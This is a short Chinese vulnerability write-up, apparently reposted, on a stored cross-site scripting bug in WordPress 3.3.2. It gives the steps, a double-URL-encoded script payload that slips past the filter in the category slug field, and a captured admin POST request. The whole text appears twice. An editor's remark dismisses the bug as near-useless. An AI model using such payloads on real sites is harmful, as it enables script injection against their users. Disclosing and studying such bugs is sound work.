WordPress 3.3.2鸡肋存储型跨站漏洞的分析
程序员文章站
2022-04-07 18:02:45
WordPress最新版本3.3.2存在一个双字节编码的存储型跨站漏洞,可以bypass内置的filter机制,但是利用起来有点鸡肋... 12-06-07...
wordpress最新版本3.3.2存在一个双字节编码的存储型跨站漏洞,可以bypass内置的filter机制,但是利用起来有点鸡肋,细节如下:
1:登录管理账户
2:单击分类
3:填写跨站参数,并用burp suite拦截请求
4:输入%253cscript%253ealert%25281%2529%253c%252fscript%253e可以直接bypass。
burp请求数据包:
post /wordpress/wp-admin/edit-tags.php http/1.1
host: localhost
user-agent: mozilla/5.0 (x11; linux i686; rv:11.0) gecko/20100101 firefox/11.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
accept-language: en-us,en;q=0.5
accept-encoding: gzip, deflate
proxy-connection: keep-alive
referer:
https://www.jb51.net /wordpress/wp-admin/edit-tags.php?action=edit&taxonomy=link_category&tag_id=2&post_type=post
cookie:
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7c1335544051%7c197b22093eaefaf6950bd81d6aa6372b;
wp-settings-time-1=1335371272; wordpress_test_cookie=wp+cookie+check;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7c1335544051%7c6ebcb9d0104a37c6d7a91274ac94c6cb
content-type: application/x-www-form-urlencoded
content-length: 379
action=editedtag&tag_id=2&taxonomy=link_category&_wp_original_http_referer=http%3a%2f%2flocalhost%2fwordpress%2fwp-admin%2fedit-tags.php%3ftaxonomy%3dlink_category&_wpnonce=83974d7f8f&_wp_http_referer=%2fwordpress%2fwp-admin%2fedit-tags.php%3faction%3dedit%26taxonomy%3dlink_category%26tag_id%3d2%26post_type%3dpost&name=blogroll&slug=injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e&description=sectest&submit=update
小编:鸡肋,鸡肋中的鸡肋,minminmsn同学应该是翻译自国外的文章,没有经过详细的测试,wordpress默认的filter机制对管理员权限是不过滤的,所以不仅仅在分类里存在跨站,其他地方更是跨站多多。也许有其他的猥琐的用途吧。
作者:freebuf
1:登录管理账户
2:单击分类
3:填写跨站参数,并用burp suite拦截请求
4:输入%253cscript%253ealert%25281%2529%253c%252fscript%253e可以直接bypass。
burp请求数据包:
复制代码
代码如下:post /wordpress/wp-admin/edit-tags.php http/1.1
host: localhost
user-agent: mozilla/5.0 (x11; linux i686; rv:11.0) gecko/20100101 firefox/11.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
accept-language: en-us,en;q=0.5
accept-encoding: gzip, deflate
proxy-connection: keep-alive
referer:
https://www.jb51.net /wordpress/wp-admin/edit-tags.php?action=edit&taxonomy=link_category&tag_id=2&post_type=post
cookie:
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7c1335544051%7c197b22093eaefaf6950bd81d6aa6372b;
wp-settings-time-1=1335371272; wordpress_test_cookie=wp+cookie+check;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7c1335544051%7c6ebcb9d0104a37c6d7a91274ac94c6cb
content-type: application/x-www-form-urlencoded
content-length: 379
action=editedtag&tag_id=2&taxonomy=link_category&_wp_original_http_referer=http%3a%2f%2flocalhost%2fwordpress%2fwp-admin%2fedit-tags.php%3ftaxonomy%3dlink_category&_wpnonce=83974d7f8f&_wp_http_referer=%2fwordpress%2fwp-admin%2fedit-tags.php%3faction%3dedit%26taxonomy%3dlink_category%26tag_id%3d2%26post_type%3dpost&name=blogroll&slug=injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e&description=sectest&submit=update
小编:鸡肋,鸡肋中的鸡肋,minminmsn同学应该是翻译自国外的文章,没有经过详细的测试,wordpress默认的filter机制对管理员权限是不过滤的,所以不仅仅在分类里存在跨站,其他地方更是跨站多多。也许有其他的猥琐的用途吧。
作者:freebuf